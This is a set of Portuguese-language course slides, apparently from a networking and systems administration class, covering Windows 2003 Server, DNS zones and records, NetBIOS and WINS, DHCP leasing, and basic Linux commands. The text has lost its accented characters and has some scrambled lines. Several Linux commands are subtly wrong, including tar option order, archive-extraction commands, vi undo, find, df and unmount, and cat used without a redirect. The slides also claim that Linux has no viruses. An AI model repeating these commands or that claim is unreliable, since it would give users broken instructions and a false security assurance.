>15 milhes de computadores infectados
3.3M de chamados de suporte em Set. 2003 (volume normal
relacionado a vrus de 350,000)
Muita repercusso negativa
Isto aumentar o nvel de frustrao ao ponto que vrias
organizaes iro contemplar seriamente alternativas Microsoft
Gartner Group
realmente recomendado ter cautela aqui. Os esforos [de
segurana da Microsoft] foram sinceros, mas no estou certo se
foram sinceros o suficiente. Forrester Research

Em que abordagem voc confia ?

Segurana como uma opo

Segurana como parte do sistema

Segurana como um aditivo

Segurana Embutida na Rede

Integrao extremamente complicada

Colaborao inteligente entre os


elementos

No economicamente vivel
No pode focar na principal prioridade

Viso de sistemas
Foco direto na principal prioridade

JOGO DOS ERROS

EDUCAO DO USURIO ESSENCIAL

Prtica de Segurana
x

204

Windows 2003 Server

205

Instalao

206

Instalao

207

Instalao

208

Instalao

209

Instalao 2003

210

Introduo a Servios

211

DNS

212

DNS - Domain Name Service


Padro Aberto para Resoluo de

Nomes Hierrquicos

Agrupa nomes em domnios.


A rvore de nomes armazenada num
banco de dados distribudo.
distribudo

Especificaes do DNS
RFCs 1033, 1034, 1034, 1101, 1123,
1183 e 1536.
Expecificaes da Internet Task Force

Berkeley Internet Name Domain (BIND)


Implementao desenvolvida na Berkley
University para a verso 4.3 SD Unix

Servio DNS
Servio DNS
Servidor DNS

Nome?
IP

Nome?

IPB

um ou mais servidores
armazenam um banco de dados
distribudos

Nome de Domnio
Os nomes Hierrquicos utilizados pelo DNS

so chamados FQDN:
Fully Qualified Domain Name
Exemplo:
www.pucpr.br
www: nome do host
pucpr: nome de domnio
br: nome de domnio
Nome de domnio:
Coleo de HOSTS ou de outros domnios.

rvore de nomes
RAIZ

br
br
ufpr

pucpr

Pucpr
Ufpr

www

ppgia

www
FOLHA

ppgia

www

www

Banco de Dados Distribudos

No servio DNS, os nomes esto armazenados em ZONAS. Zonas so

arquivos textos que contm os nomes de um ou mais domnios.

br

RAIZ

ZONA pucpr.br

ZONA .br
ZONA ufpr.br

pucpr

ufpr

ppgia

www

www

www

Banco de Dados Distribudos

Cada Zona pode ser armazenada num servidor DNS distinto.

ZONA .br br

servidor
dns.br

RAIZ

ZONA pucpr.br
pucpr

ZONA ufpr.br
ufpr
servidor
dns.ufpr.br

ppgia

servidor
dns.pucpr.br

www

www

www

Exemplo de arquivo de Zona


ZONA pucpr.br
@ SOA dns.pucpr.br

SOA: START OF AUTHORITY

@ NS dns.pucpr.br

NS: NAME SERVER

dns.pucpr.br. A 200.17.99.2

A: HOST

www A 200.17.99.2
www.ppgia A 200.17.98.174

SOA indica qual o servidor armazena o arquivo de zona


NS indica qual o servidor que responde pelo domnio.
Nomes terminados por . so absolutos

Exemplos de arquivo de Zona


ZONA.br

@ SOA dns.br
@ NS dns.br
pucpr NS www dns.ufpr.br
ufpr NS dns.pucpr.br
dns.pucpr A 200.17.99.2
dns.ufpr A 200.101.0.12

@ SOA dns.pucpr.br
@ NS dns.pucpr.br
dns.pucpr.br. A 200.17.99.2
www A 200.17.99.2
www.ppgia A 200.17.98.174

@ SOA dns.ufpr.br
@ NS dns.ufpr.br
dns.ufpr.br. A 200.101.0.12
www A 200.101.0.15

ZONA ufpr.br
ZONA pucpr.br

Tipos de Registros no DNS


A: Host Adress

associa um nome a um endereo IP: nome


IP.
PTR: Point Resource Record
associa um endereo IP a um nome: IP
nome.
NS: Name Server
identifica o servidor DNS no domnio.
SOA: Start of Authority
indica que o servidor de DNS a
autoridade para fornecer informaes no
domnio (authoritative).
authoritative

Consulta Reversa
O cliente fornece um nmero IP e requisita o nome

correspondente.
Os registros que relacionam IPs aos nomes so do
tipo PTR.
Por exemplo, um registro para o endereo IP 10.17.98.31
corresponde a uma entrada DNS no seguinte formato:
31.98.17.10.in-addr.arpa

Se o endereo IP no estiver contido no domnio

local (aquele controlado pelo servidor DNS


consultado), o servidor DNS contata o servidor DNS
situado num n superior da rvore.
Este mecanismo de procura seqencial consultando os
ns superiores chamado walking the tree.

Forwarder
Cada servidor DNS possui um arquivo de

configurao que diz:


Lista de zonas que ele armazena
Lista de servidores forwarders
Lista de zonas
Indica a localizao fsica do arquivo
correpondente a cada ZONA.
Lista de forwarders
Um forwarder um servidor DNS
hierarquicamente superior ao servidor corrente.
Esse servidor recebe as consultas de domnios no
armazenados pelo servidor DNS.

Exemplo
Arquivo de configurao do servidor dns.pucpr.br
forwarders
{
primeiro forwarder
segundo forwarder
etc.
}
zona
{
localizao
}
zona
{
localizao
}

forwarders
{
200.17.99.2
}
pucpr.br
{
/etc/pucprbr.dns
}

Ponteiros NS e Forwarders
FORWARDER

FORWARDER

ZONA .br
br

ZONA pucpr.br

RAIZ
NS

NS

ZONA ufpr.br
ufpr

pucpr
ppgia

www

www

www

Consulta Recursiva
Graas ao ponteiros NS e FORWARDER qualquer servidor DNS pode

responder por toda a rvore de domnios.


A resposta pode ser:
O mapeamento nome-IP requisitado
Uma mensagem de erro dizendo que o domnio ou host no foi
encontrado.
RESPOSTA AUTORITRIA

a.pucpr.br?
IP = 10.17.98.31

d.ufpr.br

.br
2

3
5

ufpr

pucpr

IP = 200.17.98.174
6
RESPOSTA NO AUTORITRIA SE VIER DA CACHE

DNS e a Internet
O root da rvore de nomes da Internet

gerenciado pelo Internet Network Information


Center (InterNIC)
InterNIC
InterNIC o nome dado a um projeto criado
num acordo entre a National Science
Foundation (NSF) e a Network Solutions, Inc.
Prov um servio de registro de nomes para
os domnios .com, .net, .org, and .edu;
O site do InterNIC http://www.internic.net
O InterNIC delega a responsabilidade de
administrar partes do domnio de nomes para
as empresas e organizaes conectadas na
Internet.

Domnios Gerenciados pelo


InterNIC
Segundo a nomenclatura adotada na

Internet, o Domain Name Space dividido


em trs reas principais:
Organization Domains:
3 caracteres para indicar a atividade da empresa.
.com, .edu, .gov, .int, .mil, .net, .org
.int: organizaes internacionais
.mil: organizaes militares
.org: organizaes no comerciais

Geographical Domains:
2 caracteres para identificar o pas.
.br, .fr, .jp, etc.

Reverse domain:
domnio especial utilizado para associar endereos IP
aos nomes.

Exemplo
Gerido pelo
InterNIC

.br
.com

.org
Gerido pela
FAPESP

Fully qualified domain


name
(FQDN)
www.pucpr.br

.edu
.com
.pucpr
Gerido pela
PUC

www

rla01
ppgia

Zonas

REGISTRO
NS

Servidor DNS
do Internic

.br
.com

.org

Servidor DNS da
FAPESP

.edu
.com
.pucpr

Servidor DNS da
PUC

www

rla01
ppgia

Tipos de Servidores
Primrio
o servidor autoritrio para zona. A incluso, alteraes
ou excluso dos registros da zona so feitas atravs
deste servidor.
O servidor primrio envia uma cpia dos seus arquivos
de dados para o servidor secundrio atravs de um
processo denominado zone transfer

Secundrio
Funciona como backup. Apenas l os arquivos de dados
do servidor primrio, e responde as requisies dos
clientes quando requisitado.

Caching-Only
So servidores DNS que apenas efetuam consultas e
guardam o resultado numa cache e retornam os
resultados.
Um servidor DNS realiza consulta a outros servidores
sempre que tiver que localizar um nome externo as
zonas que controla.

DNS - Resumo

Vantagens:

Implementa um mecanismo de nomes hierrquico.


Isto facilita a organizao dos nomes em redes de
grande porte.

O banco de dados que armazena os nomes


distribudo.
Cada servidor DNS contm informaes de zonas
especficas, e pode ser administrado separadamente.

o mecanismo de nomes adotado na Internet.


Pode ser utilizado para resolver nomes na rede local
(intranet) e na rede Internet.

Desvantagem:
No dinmico.
responsabilidade do administrador manter as
entradas do arquivo de nomes atualizada.

Netbios

233

Nomes NetBIOS
O espao de nomes NetBIOS flat
flat = no segmentado
implica que cada nome NetBIOS na rede deve ser nico

Os recursos na rede so identificados por nomes

NetBIOS registrados dinmicamente quando:


o computador inicializado
servios so inicializados
usurio se loga.

Nomes NetBIOS tem 16 caracteres de

comprimento.
O usurio atribui os 15 primeiros caracteres.
O ltimo caracter reservado para indentificar o tipo
de recursos.

Nomes Registrados na Estao


C:\>nbtstat -n
Endeo-Ip n: [200.17.98.217] Identificador de escopo:

[]
Tabela de nomes locais de NetBIOS

Nome
Tipo Status
-----------------------------------------------------------------------PPGIA16
<00> UNIQUE
Registrado
PPGIA16
<20> UNIQUE
Registrado
MESTRADO <00> GROUP
Registrado
PPGIA16
<03> UNIQUE
Registrado
MESTRADO <1E> GROUP
Registrado
JAMHOUR <03> UNIQUE
Registrado

Nomes NetBIOS
Podem ser de dois tipos:
UNIQUE (one owner)
Referenciam um nico recurso na rede
Exemplo: uma estao

GROUP (multiple owner)


Referenciam um conjunto de recursos na rede
Exemplo: nome de domnio, nome de grupo

Alguns exemplos de tipos para identificadores

nicos so:
<00> Nome do Computador e do Domno (ou grupo)
<03> Usurio logado
<20> Servio de nomes de servidor para
sincronizao de arquivos compartilhados

Registro e Resoluo de Nomes


NetBIOS
Os seguintes mecanismos so utilizados

para localizar recursos NetBIOS

NetBIOS name cache


NetBIOS name server - WINS server
IP subnet broadcast
Static LMHOSTS files
Static HOSTS files
DNS servers

Os mecanismos de resoluo de nomes do

NetBIOS sobre TCP/IP so definidos pelas


RFCs 1001 e 1002
de acordo com a estratgia utilizada para resolver
nomes, os computadores so denominados bnode, p-nome, m-node ou h-node.

Resoluo de Nomes por


BroadCast

Resoluo de nomes usado broadcast IP fornece um

mtodo dinnico para resoluo de endereos.


Datagrama NetBIOS Name Query em broadcast
perguntando o nome correspondente ao endereo.
Endereo MAC: FF-FF-FF-FF-FF-FF
Endereo IP: 255.255.255.255
Problemas:
Aumento do trfego na rede
No funciona em redes segmentadas por rotedores
Os recursos localizados em outras redes no
recebem os pedidos de broadcast pois, por
default, o roteador bloqueia os pacotes
recebidos em broadcast.

Extranets = VPN (Virtual Private Networks)


NOMES NETBIOS

ACME

REDE A

IAPO1

NOMES NETBIOS

IAPO2

LAB0101

PPGIA

REDE B
BROADCAST

BROADCAST

Cache com Nomes NetBIOS


Cada estao mantm uma tabela com os nomes

NetBIOS mais usados recentemente.


C:\>nbtstat -c
Endereo-Ip n: [200.17.98.217] Identificador de

escopo: []
Tabela de nomes de caches remotas de NetBIOS

Nome
Tipo
Endereo Host
Durao [seg]
--------------------------------------------------------------PPGIA07
<00> UNIQUE
200.17.98.224 20
PPGIA07
<20> UNIQUE
200.17.98.224 600
HAL2001
<00> UNIQUE
10.17.98.31
660

Usando o Arquivo HOSTS


O arquivo hosts permite relacionar nomes a

IPs, evitando a resoluo por broadcast.


A diretiva #PRE pode ser utilizada para registrar
entradas diretamente na cache.
Neste caso, as entradas so consultadas antes de
qualquer outro mecanismo de resoluo:

Exemplos:
10.17.98.31 hal2001 #pre
cache
10.17.08.30 PPGIA16

#coloca a entrada na
#no coloca na cache

Existe tambm uma diretiva especial para

definir domnios:
10.17.98.42 server1 #pre

#DOM:ELETRICA.RIEP

SERVIDORES DE NOMES NETBIOS

MECANISMO DE RESOLUO DE NOMES

NETBIOS SEM BROADCAST


Mantm uma tabela que mapeia os endereos IP com
o nome dos computadores.
A tabela atualizada dinamicamente toda a vez que
uma mquina recebe um novo endereo IP.

Exemplo: WINS: Windows Internet Name Service


O servio WINS trabalha numa arquitetura

cliente-servidor.
WINS Server:
manipula todos as consultas de nomes.

WINS Client:
registra seu nome e endereo no servidor WINS.
envia as requisies de nomes para o WINS server.

WINS NO USA BROADCAST


IP e NOME so fornecidos na inicializao

WINS
SERVER

TABELA
DINMICA

ACME

IAPO1

IAPO2

LAB0101

PPGIA

REDE B

REDE A
REQUEST

REPLY

Caractersticas do WINS

Ao contrrio da resoluo de nomes por broadcast, WINS permite

que os nomes sejam resolvidos de maneira transparente atravs


de roteadores.
WINS server

replicao

WINS enabled
Non- WINS enabled

roteador

WINS proxy

LINK DE BAIXA
CAPACIDADE

WINS server

Definies

WINS Server

Computador que executa o servio Windows Internet


Name
Este computador mantem uma base de dados
relacionando os nomes e os endereos IP das estaes
na rede.

Pode haver mais de um servidor WINS na rede.

Cliente WINS enabled


Estao configurada para resolver nomes pelo WINS.

Cliente Non-WINS enabled


Estao no configurada ou incompatvel com o
servio WINS.

WINS proxy
Estaes que acessam o servio WINS para os
clientes Non-WINS enable.

Mltiplos Servidores WINS


A utilizao de mltiplos servidores WINS

aconselhvel pois:
permite distribuir a carga de resoluo de nomes
as consultas de nomes feita pelos clientes so
ponto-a-ponto.
O mecanismo de broadcast s utilizado quando
o nome solicitado no encontrado na base do
servidor WINS.
diminui a possibilidade de interrupo do servio de
nomes
cada servidor WINS possui uma cpia completa
da base de nomes, funcionando como backup
dos demais.
quando um servidor entra em pane, os clientes
passam a consultar automaticamente o outro
servidor.

WINS NO APROPRIADO PARA INTERNET


WINS SERVER

WINS SERVER
REPLICAO

WINS SERVER

WINS SERVER

Para redes grandes, o WINS invivel pois:


O nmero de replicaes muito grande
Cada servidor WINS guarda uma cpia completa de todos os
nomes.

Ciclo de Vida dos Nomes NetBIOS

Os nomes NetBIOS so concedidos por emprstimo. Precisam

ser renovados periodicamente para que o computador


mantenha o nome.

O cliente foi
desligado
Ou o nome foi
liberado
explicitamente

Active
(Ativo)

O prazo de
renovao foi
esgotado (6 dias)

Released
(Liberado)
No renovado
(x dias)

OUTRO COMPUTADOR PODE


SOLICITAR O DIREITO DE
USAR O NOME

Elimando

Resoluo de Nomes
Os mecanismos de resoluo de nomes do NetBIOS sobre

TCP/IP so definidos pelas RFCs 1001 e 1002.

b-node: (broadcast-node)
resolvem nomes por broadcast de IP
p-node: (point-to-point-node)
usam um servidor de nomes NetBIOS
m-node: (mix -node)
se b-node falhar tentam p-node.
h-node: (hybrid-node)
se p-node falhar tentam b-node
Em redes microsoft, a configurao do cliente pode ser verificada com o utilitrio

ipconfig /all.

WINS - Resumo
Vantagens:
Reduz significativamente o nmero de broadcasts de
endereos IP necessrios para localizar recursos locais
e remotos.
Permite que clientes resolvam nomes de estaes
situados em segmentos remotos isolados por
roteadores.
Reduz a necessidade de manter e atualizar os
arquivos LMHOSTS.

Desvantagens:
No implementa um mecanismo de nomes
hierrquico. Isto dificulta a administrao de redes de
grande porte.
O banco de dados que armazena os nomes NetBIOS
no distribudo. Cada servidor WINS constitui uma
rplica completa do banco de dados de nomes.
No compatvel com o servio de nomes usado na
Internet.

DHCP

251

DHCP
Dynamic Host Configuration Protocol
Padro Industrial Aberto
IETF RFC 1533, 1534, 1541 e 1542.
IETF: Internet Engineering Task Force
RFC: Request for Comments

Utilizado para centralizar a


administrao e configurao de
parmetros TCP/IP numa rede.
Elimina a necessidade de configurar
manualmente os clientes numa rede
TCP/IP.

DHCP - Arquitetura ClienteUm computador da rede deve funcionar como servidor DHCP.
Servidor
REQUEST
SERVIDOR
DHCP

CLIENTES
DHCP

REPLY

Administrao de Endereos IP
Cada computador numa rede TCP/IP deve ter

um endereo IP nico.
O endereo IP identifica a estao e a rede ao qual a
estao pertence.
Quando o computador movido para outra rede, seu
endereo IP deve refletir esta mudana.

DHCP especifica os seguintes servios (RFC

1541):
um protocolo para que o servidor DHCP e seus
clientes se comuniquem.
PROTOCOLO BOOTP

Um mtodo para configura os parmetros de rede de


um host IP:
IP, mscara, gateway default, servidores de nomes,
etc.

ESCOPO DHCP
Quando se utiliza DHCP, cada rede local

caracterizada por um ESCOPO:


PARTE FIXA
MASCARA
GATEWAY
SERVIDOR DE NOMES
OUTRAS ROTAS
PERODO DE EMPRSTIMO

PARTE DINMICA
RANGE DE IPS

MESMO VALOR
PARA TODOS OS
HOSTS DO ESCOPO

UM VALOR
DIFERENTE PARA
CADA HOST DO
ESCOPO

Processo de Atribuio
Dhcpdiscover
Dhcpoffer 200.17.98.1

Cliente
DHCP

Dhcprequest 200.17.98.1

ESCOPO

255.255.255.0
200.17.98.23
72 horas
200.17.98.1

200.17.98.254

Dhcpack 200.17.98.1

Todas as
mensagens so
enviadas em
broadcast

...
Dhcprelease 200.17.98.1

Servidor
DHCP

Processo de Atribuio
1) O cliente envia a mensagem Dhcpdiscover em broadcast.

O endereo IP de origem do pacote 0.0.0.0 pois o cliente


ainda no tem um endereo IP.
2) Quando o servidor recebe o pacote, ele seleciona um
endereo IP disponvel na sua lista e oferece ao cliente.
O servidor responde ao cliente com a mensagem
Dhcpoffer
3) Quando o cliente recebe a oferta ele pode:
aceitar enviando a mensagem Dhcprequest (incluindo o
IP) em broadcast
recusar enviando a mensagem Dhcpdecline em broadcast
4) Quando o servidor recebe o Dhcprequest ele pode:
confirmar para o cliente com a mensagem Dhcpack
recusar, se o endereo foi usado por outro, com a
mensagem Dhcpnack
5) O cliente pode liberar um endereo com a mensagem
Dhcprelease.

Observaes
1) O cliente aceita a primeira oferta que

receber.
Se houver mais de um servidor DHCP
distribuindo endereos IP, no haver como
selecionar apenas um deles.
2) O direito do cliente de usar o endereo IP
recebido pelo servidor DHCP temporrio.
Quando o prazo de validade do IP expira, o
servidor pode atribu-lo a outra estao na
rede.
O cliente pode liber-lo antecipadamente
com a mensagem Dhcprelease

Observaes
3) Se o cliente no receber a oferta do

servidor:
Ele repete o pedido em intervalos de 2, 4,
8, 16 segundos.
Se as 4 tentativas fracassarem, ele tenta
novamente em intervalos de 5 minutos.
4) Quando o cliente reinicializado, ele
tenta utilizar o mesmo IP que tinha
anteriormente.
Ele envia o pacote Dhcprequest com o
endereo IP antigo ao invs do
Dhcpdiscover.
Se o pedido negado, ento o cliente
envia um Dhcpdiscover.

Processo de Atribuio: Outras


Vezes
255.255.255.0
ESCOPO

Dhcprequest 200.17.98.1

Dhcpack 200.17.98.1

Cliente
DHCP

OU

200.17.98.23
72 horas
200.17.98.1

200.17.98.254

Dhcpnack

Todas as
mensagens so
enviadas em
broadcast

Dhcpdiscover

Servidor
DHCP

Consideraes sobre o
Planejamento da
Implementao do DHCP
Para redes no segmentadas:
Um nico servidor DHCP pode atender at 10000
clientes (estimativa).

Para redes segmentadas:


Se os roteadores so compatveis com a RFC1542
Um nico servidor DHCP suficiente.

Se os roteadores no so compatveis com a RFC1542


Deve-se utilizar um servidor DHCP para cada rede.

Computadores que se ligam temporariamente

na rede (notebooks, por exemplo) devem


receber IPs com tempo de leasing curto.

Posicionando Servidores DHCP


Servidor
DHCP 1
Agente relay
DHCP/BOO
TP
Roteador
RFC 1542
compatvel

Roteador no RFC
1542
compatvel

Servidor
DHCP 2

Prtica: DHCP
Instalar e configurar o DHCP;
Criar Escopo
reas de excluses
Definir arquivos por MAC ADDRESS

263

Prtica : Instalao DHCP

264

Prtica: Instalao de Servios


DNS
Terminal Service
Wins

265

Instalar Terminal Service

266

Prtica : Instalando o IIS


Instalando e configurando
Disponibilizando um site
Configurando o DNS

267

Prtica: IIS

268

Prtica: IIS

269

Prtica: Criao de Domnio


Instalar e configurar o dominio;
Criar usurios
Compartilhamento de arquivos
Definio de segurana com o GPO

270

Prtica: Instalao DHCP

271

Prtica: Criar Domnio


Iniciar / Executar / dcpromo

272

Prtica: Criar Domnio

273

Prtica: Criar Domnio

274

LiNUX: Ubuntu

275

Instalao

276

Instalao (cont)

277

Estrutura dos diretrios


Vamos conhece-los de acordo com a FHS (Filesystem Hierarchy
Standard):
Todos os diretrios abaixo ento dentro do diretrio raiz, ou seja, /.
/bin : Arquivos e programas do sistema que so usados com
freqncia pelos usurios.
/boot : Arquivos necessrios para a inicializao do sistema.
/cdrom : Ponto de montagem da unidade de CD-ROM.
/dev : Arquivos usados para acessar dispositivos do computador.
/etc : Arquivos de configurao do computador.
/floppy : Ponto de montagem de unidade de disquetes
/home : Diretrio que contm os arquivos de cada usurio.
/lib : Bibliotecas do sistema.
/lost+found : Local de arquivos e/ou diretrios recuperados pelo
sistema.

278

Estrutura dos diretrios (cont)


/mnt : Ponto de montagem temporrio.
/proc : Sistema de arquivos do Kernel.
/root : Diretrio do usurio root, o administrador do sistema.
/opt : Local para aplicativos opcionais serem instalados.
/media : Ponto de montagem de mdia removvel, cmeras digitais,

pendrives
/sbin : Diretrio de programas usados pelo superusurio (root) para
administrao e controle do funcionamento do sistema.
/tmp : Arquivos temporrios criados por programas.
/usr : Diretrio dos aplicativos. A maioria estar instalada neste diretrio.
Curiosidade: usr no quer dizer User e sim Unix System Resources.
/var : Diretrio contm arquivos que so gravados com freqncia pelos
aplicativos do sistema, como: e-mails, cache, spool de impressora.
Essa estrutura que mostrei acima, considerada padro. Encontrar a
mesma se estiver utilizando a distribuio da Red Hat, SuSe ou o Ubuntu.

279

Estrutura de dispositivos
Linux
ttyS0
ttyS1
ttyS2
ttyS3
lp0
lp1
/dev/hda1
/dev/hda2
/dev/hdb1

DOS
COM1
COM2
COM3
COM4
LPT1
LPT2
C:
D:
D:

IRQ
4
3
4
3
7
5
14
* 14
15

DMA I/O
0x3F8
0x2F8
0x3E8
0x2E8
3(ECP) 0x378
3(ECP) 0x278
0x1F0,0x3F6
0x1F0,0x3F6
0x170,0x376

280

Comandos Bsicos Comparao DOS x Linux


DOS

Linux

Diferenas

cls

clear

Sem diferenas.

dir

ls -la

A listagem no Linux possui mais campos (as


permisses de acesso) e o total de espao ocupado no
diretrio e livre no disco deve ser vistos separadamente
usando o comando du e df. Permite tambm listar o contedo
de diversos diretrios com um s comando (ls /bin /sbin /...).

cd

cd

Poucas diferenas. cd sem parmetros retorna ao diretrio de


usurio e tambm permite o uso de "cd -" para retornar ao
diretrio anteriormente acessado.

del

rm

Poucas diferenas. O rm do Linux permite especificar diversos


arquivos que sero apagados (rm arquivo1 arquivo2 arquivo3).
Para ser mostrados os arquivos apagados, deve-se especificar
o
parmetro "-v" ao comando, e "-i" para pedir a confirmao ao
apagar arquivos.

md

mkdir

Uma s diferena: No Linux permite que vrios diretrios


sejam criados de uma s vez (mkdir /tmp/a /tmp/b...).

fdisk

fdisk,
cfdisk

Os particionadores do Linux trabalham com praticamente


todos os tipos de parties de diversos sistemas de arquivos
diferentes.

281

DOS

Comandos Bsicos Comparao DOS x Linux


Linux

Diferenas

echo

echo

Sem diferenas.

copy

cp

Poucas diferenas. Para ser mostrados os arquivos enquanto


esto sendo copiados, deve-se usar a opo "-v", e para que
ele pergunte se deseja substituir um arquivo j existente,
deve-se usar a opo "-i".

path

path

No Linux deve ser usado ":" para separar os diretrios e usar o


comando "export PATH=caminho1:/caminho2:/caminho3:"
para definir a varivel de ambiente PATH. O path atual pode
ser visualizado atravs do comando "echo $PATH".

ren

mv

Poucas diferenas. No Linux no possvel renomear vrios


arquivos de uma s vez (como "ren *.txt *.bak"). necessrio
usar um shell script para fazer isto.

type

cat

Sem diferenas.

ver

uname -a

Poucas diferenas (o uname tem algumas opes a mais).

format

mkfs.ext3

Poucas diferenas, precisa apenas que seja especificado o


dispositivo a ser formatado como "/dev/fd0" ou "/dev/hda10"
(o
tipo de identificao usada no Linux), ao invs de "A:" ou "C:".

mem

cat
/proc/memin

Mostra detalhes sobre a quantidade de dados em buffers,


cache e memria virtual (disco).

282

DOS

Comandos Bsicos Comparao DOS x Linux


Linux

Diferenas

date

date

No Linux mostra/modifica a Data e Hora do sistema.

time

date

No Linux mostra/modifica a Data e Hora do sistema.

attrib

chmod

O chmod possui mais opes por tratar as permisses


de acesso de leitura, gravao e execuo para donos,
grupos e outros usurios.

chkdsk

fsck.ext3

O fsck mais rpido e a checagem mais abrangente.

scandisk

fsck.ext3

O fsck mais rpido e a checagem mais abrangente.

doskey

-----

A memorizao de comandos feita automaticamente


pelo bash.

edit

vi, ae,
emacs,
mcedit

O edit mais fcil de usar, mas usurio experientes


apreciaro os recursos do vi ou o emacs (programado
em lisp)

interlnk

plip

O plip do Linux permite que sejam montadas redes


reais a partir de uma conexo via Cabo Paralelo ou
Serial. A mquina pode fazer tudo o que poderia fazer
conectada em uma rede
(na realidade uma rede e usa o TCP/IP como
protocolo) inclusive navegar na Internet, enviar emails, irc, etc.

intersvr

plip

Mesmo que o acima.

283

DOS

Comandos Bsicos Comparao DOS x Linux


Linux

Diferenas

label

e2label

necessrio especificar a partio que ter

more

more, less

O more equivalente a ambos os sistemas, mas o less


permite que sejam usadas as setas para cima e para baixo, o
que torna a leitura do texto muito mais agradvel.

move

mv

Poucas diferenas. Para ser mostrados os arquivos enquanto


esto sendo movidos, deve-se usar a opo "-v", e para que
ele pergunte se deseja substituir um arquivo j existente
deve-se usar a opo "-i".

scan

-----

No existem vrus no Linux devido as restries do usurio


durante execuo de programas.

backup

tar

O tar permite o uso de compactao (atravs do parmetro


-z) e tem um melhor esquema de recuperao de arquivos
corrompidos que j segue evoluindo h 30 anos em sistemas
UNIX.

print

lpr

O lpr mais rpido e permite at mesmo impresses de


grficos ou arquivos compactados diretamente caso seja
usado o programa magicfilter. o programa de Spool de
impressoras usados no sistema Linux/Unix.

vol

e2label

Sem diferenas.

xcopy

cp -R

Pouca diferena, requer que seja usado a opo "-v" para


mostrar os arquivos que esto sendo copiados e "-i" para
pedir

284

Comandos Bsicos
Verificar o Local onde est trabalhando => pwd
Criar diretrio => mkdir <diretorio>

mkdir <aula>
Chamar diretrio => cd

cd aula
Verificar o que existe no diretrio => ls la
Criar arquivos vazios => touch

touch arquivo1
Editar o arquivo => vi, mc,

vi <arquivo> ou vi /<caminho>/arquivo
285

Comandos Bsicos
Alguns comandos do vi

inserir -> a,insert


yy
-> copiar (copiar n linhas usar n cc)
dd -> apagar (apaga n linhas usar n dd)
p
-> colar
/
-> procurar
v -> desfaz a ltima alterao
:x ou :wq -> salva e sai
:q! -> sair sem salvar
Criar o texto abaixo (crie 2 arquivos fazios chamado http e telnet edite o texto

abaixo):
### Permite acesso web (HTTP).
$IPTABLES -A FORWARD -p tcp --dport 80 -j ACCEPT
### Permite acesso web (TELNET).
$IPTABLES -A FORWARD -p tcp dport 23 -j ACCEPT

286

Comandos Bsicos
Move arquivo => mv

mv /<caminho_antigo>/<arquivo>
/<novo_caminho>/<arquivo>
Renomear arquivo=> mv

mv /<caminho>/<arquivo atual> /<caminho>/<arquivo novo >


Diferena entre 2 arquivos => diff

diff <arquivo1> <arquivo2>


Para melhor fixao faa o seguinte exerccio:
- Na sua pasta home, crie um diretrio chamado aula e dentre
dele mais dois diretrios chamados http e ftp.
- Move os arquivos criados anteriormente (http e ftp) para as
suas respectivas pastas
- Renomeie os arquivos para new_http e new_ftp
- Verifique a diferena entre os arquivos
287

Comandos Bsicos
verificar uma placa de rede => ifconfig
Verificar os usurios que esto logados ou em telnet => w
Compactar arquivos

Tar.gz => tar -cvfz <nm do arquivo>.tar.gz <diretrio a ser compactado>


Ex: tar -cvfz etc.tar.gz etc
bz2 (melhor compactao)
tar cvjf <nmdoarquivo>.tar.bz2 /<caminhod do arquivo>
EX: tar cvjf ergon.tar.bz2 /mnt/temp
Para descompactar estes formatos de arquivos, os comandos so simples:

zip: => gunzip nomedoarquivo


rar: => rar x nomedoarquivo
tar: => gzip nomedoarquivo
tar.gz: => tar -vzxf nomedoarquivo
tar.bz2: => tar -vxjpf nomedoarquivo

288

Comandos Bsicos
juntar dois arquivos => cat <arquivo final> <arquivo1> <arquivo2>
Dar permisso arquivos => chmod

chmod <numero> <caminho/arquivo>


Verificao de Permisso (direito nos arquivos)

d rwx r-x wx
d => diretrio
1 trinca => usurio proprietrio
2 trinca => grupo do usurio proprietrio
3 trinca => outros usurio
r -> read (4) w-> write (2) x ->execute (1)
rwx -> 4+2+1=7
r-x -> 4+0+1=5
rw- -> 4+2+0=6
r-- -> 4+0+0=4

289

Comandos bsicos
Exerccio de fixao

Dentro do diretrio aula crie um arquivo


apartir da juno dos arquivos http_new e
ftp_new, cujo nome ser firewall, sendo que
este arquivo dever ter as seguintes
permises:
Usurio proprietrio = completo
Grupo usurio proprietrio = leitura e escrita
Outros = leitura e execuo
Depois faa a compactao da pasta aula

290

Comandos Bsicos
Verificar processos rodando na maquina => top ou ps aux ou os

-aux |grep <processo>


Matar processos => kill -9 <pid processo>
Montar unidades (cdrom, pen driver, hd sata, ...) => mount

$ sudo fdisk l
$ mount /dev/sda
Desmontar => unmount

Unmount /dev/das
Exerccio:
Mountar e desmontar a unidade do cdrom.
Abrir uma nova sesso (console) e matar o seu processo.

291

Comandos Bsicos

Respostas

sudo mount /dev/cdrom /cdrom


umount /cdrom
ps aux |grep console
Kill -9 <numero processo>
Localizar arquivos no computador => find ou locate

$ find caminho expresses


updatedb &
locate <arquivo>
Ex: Para localizar arquivos que foram acessados nos ltimos 10 dias e os
arquivos cujo nome seja sysconfig
$ find / -used 10 e $locate sysconfig
Exerccio: Localizar todos os arquivos que possuam a palavra host e que
estejam dentro da pasta /var

Updatedb
Locate host | grep var

ou find /var | grep host


292

Comandos bsicos
verificar o espao em disco => df h
verificar o que o diretrio possue e o tamanho => du h
Verificar memria => free
Verifica os espaos por parties => dh -f

Verifica o tamanho dos arquivos e faz a soma do total no final


=>df -h c
Verificar o processador do servidor => cat /proc/cpuinfo

reparar disco (*) => fsck -cy /dev/???

Exerccio: Gostaria de saber quanto tenho de espao de disco livre e


quanto de espao o meu diretrio, a quantidade de memria total
e livre, qual o meu processador, a quantidade de processos
$ edfreparar
h o meu disco
rodando nele

$ du -h /home/virtual
$free
$ top
$ cat /proc/cpuinfo
$ fsck cv /dev/sda1

293

Localizao de Arquivos Importantes

servios e resolues de problemas


dhcpd
==> /etc/rc.d/init.d/dhcpd restart
samba
==> /etc/rc.d/init.d/smb restart
apache ==> /etc/rc.d/init.d/httpd restart
sendmail ==> /etc/rc.d/init.d/sendmail restart

verificaes de logs
dhcpd
==> /var/log/mensages
samba
==> /var/log/samba/log.smb
log.nmb
log.<nm do computador>
apache ==> /var/log/httpd/access_log
sendmail ==> /var/log/maillog
printer ==> /var/log/spooler

arquivos para serem backpeados


usurio
==> /etc/passwd
grupos
==> /etc/group
conf impressora ==> /etc/printcap
tabela de IP
==> /etc/hosts
dhcpd
==> /etc/dhcpd.conf
sendmail
==> /etc/sendmail.cf
samba
==> /etc/smb.conf
senhas do samba ==> /etc/smbpasswd
apache
==>
/etc/httpd/conf/acess.conf
/etc/httpd.conf
/etc/srm.conf

294

